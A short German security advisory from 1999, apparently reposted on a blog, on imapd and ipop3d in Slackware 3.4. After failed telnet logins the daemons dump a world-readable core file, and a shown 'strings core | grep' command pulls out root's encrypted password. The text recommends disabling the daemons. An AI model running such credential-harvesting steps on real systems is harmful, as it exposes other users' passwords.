Sicherheitslücke in Linux/Unix

Informationsquelle: Vision Crew Stuttgart
(c) 1999 by MerLinVC
Herausgefunden durch: Test für Kunde (Nr-19828)

Sicherheitsprobleme bei imapd und ipop3d
Betriebssystem Unix / Linux Slackware 3.4 mit installiertem pine-Paket
Software /usr/sbin/imapd bzw. /usr/sbin/ipop3d
Angriffe Auslesen von Paßwörtern
Stichworte Pufferüberlauf, Paßwörter
Datum 01.02.1999

Die beiden Dämonen imapd und ipop3d nehmen Anfragen von Clients entgegen
und versorgen diese mit den angekommenen E-mails im POP3- bzw. IMAP-Standard.
Dazu warten dieProgramme an den Ports 143 (imapd) und 110 (pop3d). (mac)

Problem
Bei einem Anmeldeversuch mit unbekanntem User über Telnet direkt an den beiden Ports stürzen die Programme mit einem Coredump ab. In der Datei /core, die für Jedermannlesbar ist, stehen diverse Paßwörter verschlüsselt oder im Klartext.;)] Jeder User mit lokalem Account kann Paßwörter direkt auslesen bzw. in den Besitz von Shadow-Paßwörtern gelangen und diese ggf. mit einem Paßwortcracker entschlüsseln.

Empfehlung
Als Workaround sollten die beiden Dämonen deaktiviert werden. Patches sind nicht verfügbar.

Information
Folgendes Beispiel demonstriert den Bug. [root@koek] /# telnet zopie 110

Trying 10.10.13.1…
Connected to zopie.attic.vuurwerk.nl.
Escape character is ‚^]‘.
+OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU)
at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.

At this point ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
root

[crypted pw here]

10244

Sun Feb 1 23:45:15 1998

Schreibe einen Kommentar